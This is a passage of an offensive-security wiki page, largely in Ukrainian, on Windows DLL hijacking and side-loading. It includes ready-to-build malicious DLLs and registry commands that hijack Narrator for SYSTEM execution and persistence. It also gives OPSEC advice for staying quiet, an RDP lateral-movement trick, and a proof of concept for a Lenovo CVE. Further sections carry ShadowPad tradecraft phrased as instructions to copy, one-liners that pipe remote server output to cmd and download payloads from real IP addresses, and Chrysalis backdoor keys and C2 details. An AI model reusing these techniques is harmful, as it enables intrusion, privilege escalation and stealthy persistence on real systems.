#include<windows.h> #include<stdlib.h> #include<stdio.h>

void Entry (){ //Default function that is executed when the DLL is loaded system(“cmd”); }

BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call){ case DLL_PROCESS_ATTACH: CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DEATCH: break; } return TRUE; }

</details>

## Дослідження випадку: Narrator OneCore TTS Localization DLL Hijack (Accessibility/ATs)

Windows Narrator.exe все ще перевіряє передбачувану, специфічну для мови DLL локалізації під час запуску, яку можна захопити для виконання довільного коду та отримання персистентності.

Ключові факти
- Probe path (current builds): `%windir%\System32\speech_onecore\engines\tts\msttsloc_onecoreenus.dll` (EN-US).
- Старий шлях (старіші збірки): `%windir%\System32\speech\engine\tts\msttslocenus.dll`.
- Якщо в OneCore-шляху існує записувана DLL, контрольована нападником, вона завантажується і виконується `DllMain(DLL_PROCESS_ATTACH)`. Експорти не потрібні.

Виявлення за допомогою Procmon
- Фільтр: `Process Name is Narrator.exe` and `Operation is Load Image` or `CreateFile`.
- Запустіть Narrator і спостерігайте за спробою завантаження вказаного шляху.

Minimal DLL
```c
// Build as msttsloc_onecoreenus.dll and place in the OneCore TTS path
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
// Optional OPSEC: DisableThreadLibraryCalls(h);
// Suspend/quiet Narrator main thread, then run payload
// (see PoC for implementation details)
}
return TRUE;
}

OPSEC silence

• A naive hijack will speak/highlight UI. To stay quiet, on attach enumerate Narrator threads, open the main thread (OpenThread(THREAD_SUSPEND_RESUME)) and SuspendThread it; continue in your own thread. See PoC for full code.

Trigger and persistence via Accessibility configuration

• У контексті користувача (HKCU): reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Winlogon/SYSTEM (HKLM): reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• З наведеним вище, запуск Narrator завантажує розміщений DLL. На secure desktop (екрані входу), натисніть CTRL+WIN+ENTER щоб запустити Narrator; ваш DLL виконується як SYSTEM на secure desktop.

RDP-triggered SYSTEM execution (lateral movement)

• Дозволити класичний рівень безпеки RDP: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
• RDP до хоста, на екрані входу натисніть CTRL+WIN+ENTER щоб запустити Narrator; ваш DLL виконується як SYSTEM на secure desktop.
• Виконання зупиняється коли RDP сесія закривається — інжектуйте/мігруйте оперативно.

Bring Your Own Accessibility (BYOA)

• Ви можете клонувати вбудований Accessibility Tool (AT) реєстровий запис (наприклад, CursorIndicator), відредагувати його щоб вказати на довільний binary/DLL, імпортувати його, а потім встановити configuration на ім’я цього AT. Це проксуватиме довільне виконання під Accessibility framework.

Notes

• Запис у %windir%\System32 та зміна значень HKLM вимагає прав адміністратора.
• Вся логіка payload може жити в DLL_PROCESS_ATTACH; експорти не потрібні.

Case Study: CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe

This case demonstrates Phantom DLL Hijacking in Lenovo’s TrackPoint Quick Menu (TPQMAssistant.exe), tracked as CVE-2025-1729.

Vulnerability Details

• Компонент: TPQMAssistant.exe located at C:\ProgramData\Lenovo\TPQM\Assistant\.
• Заплановане завдання: Lenovo\TrackPointQuickMenu\Schedule\ActivationDailyScheduleTask runs daily at 9:30 AM under the context of the logged-on user.
• Дозволи директорії: Writable by CREATOR OWNER, allowing local users to drop arbitrary files.
• Поведінка пошуку DLL: Attempts to load hostfxr.dll from its working directory first and logs “NAME NOT FOUND” if missing, indicating local directory search precedence.

Exploit Implementation

An attacker can place a malicious hostfxr.dll stub in the same directory, exploiting the missing DLL to achieve code execution under the user’s context:

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
// Payload: display a message box (proof-of-concept)
MessageBoxA(NULL, "DLL Hijacked!", "TPQM", MB_OK);
}
return TRUE;
}

Хід атаки

1. Як звичайний користувач, помістіть hostfxr.dll у C:\ProgramData\Lenovo\TPQM\Assistant\.
2. Дочекайтесь запуску запланованого завдання о 9:30 у контексті поточного користувача.
3. Якщо адміністратор увійшов у систему під час виконання завдання, шкідливий DLL запускається в сесії адміністратора на medium integrity.
4. Застосуйте стандартні UAC bypass techniques, щоб підвищити привілеї з medium integrity до SYSTEM.

Кейс: MSI CustomAction Dropper + DLL Side-Loading via Signed Host (wsc_proxy.exe)

Зловмисники часто поєднують MSI-based droppers з DLL side-loading, щоб виконувати payloads під довіреним, підписаним процесом.

Chain overview

• Користувач завантажує MSI. CustomAction виконується непомітно під час GUI-встановлення (наприклад, LaunchApplication або VBScript action), відновлюючи наступний етап із вбудованих ресурсів.
• Dropper записує легітимний, підписаний EXE і шкідливий DLL у той самий каталог (приклад пари: Avast-signed wsc_proxy.exe + attacker-controlled wsc.dll).
• Коли підписаний EXE запускається, Windows DLL search order спочатку завантажує wsc.dll з робочого каталогу, виконуючи код нападника під підписаним батьківським процесом (ATT&CK T1574.001).

MSI analysis (what to look for)

• CustomAction table:
• Шукайте записи, що запускають виконувані файли або VBScript. Приклад підозрілого патерну: LaunchApplication, що виконує вбудований файл у фоновому режимі.
• У Orca (Microsoft Orca.exe), перевіряйте таблиці CustomAction, InstallExecuteSequence та Binary.
• Embedded/split payloads in the MSI CAB:
• Адміністративне витягнення: msiexec /a package.msi /qb TARGETDIR=C:\out
• Або використайте lessmsi: lessmsi x package.msi C:\out
• Шукайте кілька невеликих фрагментів, які конкатенуються та розшифровуються VBScript CustomAction. Звичний потік:

' VBScript CustomAction (high level)
' 1) Read multiple fragment files from the embedded CAB (e.g., f0.bin, f1.bin, ...)
' 2) Concatenate with ADODB.Stream or FileSystemObject
' 3) Decrypt using a hardcoded password/key
' 4) Write reconstructed PE(s) to disk (e.g., wsc_proxy.exe and wsc.dll)

Практичне sideloading за допомогою wsc_proxy.exe

• Помістіть ці два файли в одну папку:
• wsc_proxy.exe: легітимний підписаний хост (Avast). Процес намагається завантажити wsc.dll за іменем з його каталогу.
• wsc.dll: зловмисна DLL. Якщо не потрібні конкретні exports, DllMain достатньо; інакше зберіть proxy DLL і перенаправте потрібні exports до справжньої бібліотеки, запускаючи payload у DllMain.
• Зберіть мінімальний DLL payload:

// x64: x86_64-w64-mingw32-gcc payload.c -shared -o wsc.dll
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
WinExec("cmd.exe /c whoami > %TEMP%\\wsc_sideload.txt", SW_HIDE);
}
return TRUE;
}

• Для вимог до експорту використовуйте proxying framework (наприклад, DLLirant/Spartacus) щоб згенерувати forwarding DLL, яка також виконує ваш payload.

• Ця техніка спирається на вирішення імен DLL хостовим бінарником. Якщо хост використовує абсолютні шляхи або safe loading flags (наприклад, LOAD_LIBRARY_SEARCH_SYSTEM32/SetDefaultDllDirectories), hijack може не вийти.

• KnownDLLs, SxS та forwarded exports можуть впливати на пріоритет і їх потрібно враховувати під час вибору хост-бінарника та набору експортів.

Signed triads + encrypted payloads (ShadowPad case study)

Check Point описали, як Ink Dragon розгортає ShadowPad, використовуючи three-file triad, щоб злитися з легітимним софтом, поки основний payload зберігається зашифрованим на диску:

1. Signed host EXE – зловживання вендорами такими як AMD, Realtek або NVIDIA (vncutil64.exe, ApplicationLogs.exe, msedge_proxyLog.exe). Атакувальники перейменовують виконуваний файл так, щоб він виглядав як Windows binary (наприклад conhost.exe), але Authenticode signature залишається дійсною.
2. Malicious loader DLL – скидається поруч з EXE під очікуваним іменем (vncutil64loc.dll, atiadlxy.dll, msedge_proxyLogLOC.dll). DLL зазвичай є MFC-бінарником, обфускованим за допомогою ScatterBrain; її єдина задача — знайти зашифрований blob, розшифрувати його та reflectively map ShadowPad.
3. Encrypted payload blob – часто зберігається як <name>.tmp в тому ж каталозі. Після memory-mapping розшифрованого payload, loader видаляє TMP-файл, щоб знищити судові сліди.

Tradecraft notes:

• Перейменування підписаного EXE (зберігаючи оригінальний OriginalFileName у PE-заголовку) дозволяє йому маскуватися під Windows binary, але зберігати вендорський підпис; відтворюйте звичку Ink Dragon скидати conhost.exe-подібні бінарники, які насправді є утилітами AMD/NVIDIA.
• Оскільки виконуваний файл залишається trusted, більшість allowlisting controls потребують лише, щоб ваш malicious DLL лежав поруч з ним. Зосередьтеся на кастомізації loader DLL; підписаний батько зазвичай може запускатися без змін.
• ShadowPad’s decryptor очікує, що TMP blob знаходиться поруч із loader та має бути записуваним, щоб він міг занулити файл після mapping. Тримайте каталог записуваним до завантаження payload; після знаходження в пам’яті TMP-файл можна безпечно видалити для OPSEC.

LOLBAS stager + staged archive sideloading chain (finger → tar/curl → WMI)

Оператори поєднують DLL sideloading з LOLBAS так, щоб єдиним кастомним артефактом на диску була malicious DLL поруч із trusted EXE:

• Remote command loader (Finger): прихований PowerShell породжує cmd.exe /c, витягує команди з Finger server і передає їх в cmd:

powershell.exe Start-Process cmd -ArgumentList '/c finger Galo@91.193.19.108 | cmd' -WindowStyle Hidden

• finger user@host тягне TCP/79 текст; | cmd виконує відповідь сервера, дозволяючи операторам крутанути second stage на стороні сервера.

• Built-in download/extract: Завантажити архів з benign extension, розпакувати його і stage-нути sideload target плюс DLL під випадковою папкою в %LocalAppData%:

$base = "$Env:LocalAppData"; $dir = Join-Path $base (Get-Random); curl -s -L -o "$dir.pdf" 79.141.172.212/tcp; mkdir "$dir"; tar -xf "$dir.pdf" -C "$dir"; $exe = "$dir\intelbq.exe"

• curl -s -L ховає прогрес і слідує за redirects; tar -xf використовує вбудований в Windows tar.

• WMI/CIM launch: Запустити EXE через WMI так, щоб телеметрія показувала процес створений CIM під час завантаження colocated DLL:

Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = "`"$exe`""}

• Працює з бінарниками, які віддають перевагу локальним DLL (наприклад, intelbq.exe, nearby_share.exe); payload (наприклад, Remcos) запускається під trusted іменем.

• Hunting: Граничте увагу на forfiles, коли одночасно з’являються /p, /m і /c; це рідко зустрічається поза адмін-скриптами.

Case Study: NSIS dropper + Bitdefender Submission Wizard sideload (Chrysalis)

Нещодавнє вторгнення Lotus Blossom зловживало trusted update chain, щоб доставити NSIS-packed dropper, який stage-ував DLL sideload плюс повністю in-memory payloads.

Tradecraft flow

• update.exe (NSIS) створює %AppData%\Bluetooth, ставить його HIDDEN, скидає перейменований Bitdefender Submission Wizard BluetoothService.exe, malicious log.dll, і зашифрований blob BluetoothService, потім запускає EXE.
• Хост EXE імпортує log.dll і викликає LogInit/LogWrite. LogInit mmap-loads blob; LogWrite розшифровує його за допомогою кастомного LCG-based stream (константи 0x19660D / 0x3C6EF35F, key material виводиться з попереднього hash), перезаписує буфер plaintext shellcode, звільняє тимчасові змінні і переходить до нього.
• Щоб уникнути IAT, loader вирішує API шляхом хешування імен експортів використовуючи FNV-1a basis 0x811C9DC5 + prime 0x1000193, потім застосовує Murmur-style avalanche (0x85EBCA6B) і порівнює з підсоленими target hashes.

Main shellcode (Chrysalis)

• Розшифровує PE-like main module повторюючи add/XOR/sub з ключем gQ2JR&9; протягом п’яти проходів, потім динамічно завантажує Kernel32.dll → GetProcAddress для завершення імпорт-реконструкції.
• Відтворює рядки імен DLL під час виконання через побітові rotate/XOR трансформації на кожному символі, потім завантажує oleaut32, advapi32, shlwapi, user32, wininet, ole32, shell32.
• Використовує другий resolver, який обходить PEB → InMemoryOrderModuleList, парсить кожну export table блоками по 4 байти з Murmur-style mixing, і тільки у випадку відсутності хешу падає back до GetProcAddress.

Embedded configuration & C2

• Конфіг живе всередині скинутого файла BluetoothService за offset 0x30808 (size 0x980) і RC4-decrypted з ключем qwhvb^435h&*7, відкриваючи C2 URL і User-Agent.
• Beacons будують dot-delimited host profile, додають префікс 4Q, потім RC4-encrypt з ключем vAuig34%^325hGV перед HttpSendRequestA по HTTPS. Відповіді RC4-decrypt-яться і розподіляються через tag switch (4T shell, 4V process exec, 4W/4X file write, 4Y read/exfil, 4\\ uninstall, 4 drive/file enum + chunked transfer cases).
• Режим виконання контролюється CLI args: без аргументів = install persistence (service/Run key) вказуючи на -i; -i перезапускає себе з -k; -k пропускає install і запускає payload.

Alternate loader observed

• У тому ж intrusion скидали Tiny C Compiler і виконували svchost.exe -nostdlib -run conf.c з C:\ProgramData\USOShared\, з libtcc.dll поруч. Наданий attacker C source вбудовував shellcode, компілював і запускав in-memory без запису PE на диск. Replicate with:

C:\ProgramData\USOShared\tcc.exe -nostdlib -run conf.c

• Цей TCC-based compile-and-run етап імпортував Wininet.dll під час виконання та витягнув second-stage shellcode з hardcoded URL, забезпечивши гнучкий loader, який маскується під compiler run.

Посилання

• Red Canary – Intelligence Insights: January 2026
• CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe
• Microsoft Store - TPQM Assistant UWP
• https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e
• https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html
• Check Point Research – Nimbus Manticore Deploys New Malware Targeting Europe
• TrustedSec – Hack-cessibility: When DLL Hijacks Meet Windows Helpers
• PoC – api0cradle/Narrator-dll
• Sysinternals Process Monitor
• Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT
• Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation
• Rapid7 – The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit
• 0xdf – HTB Bruno ZipSlip → DLL hijack chain

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks

• Перевірте плани підписки!
• Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
• Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.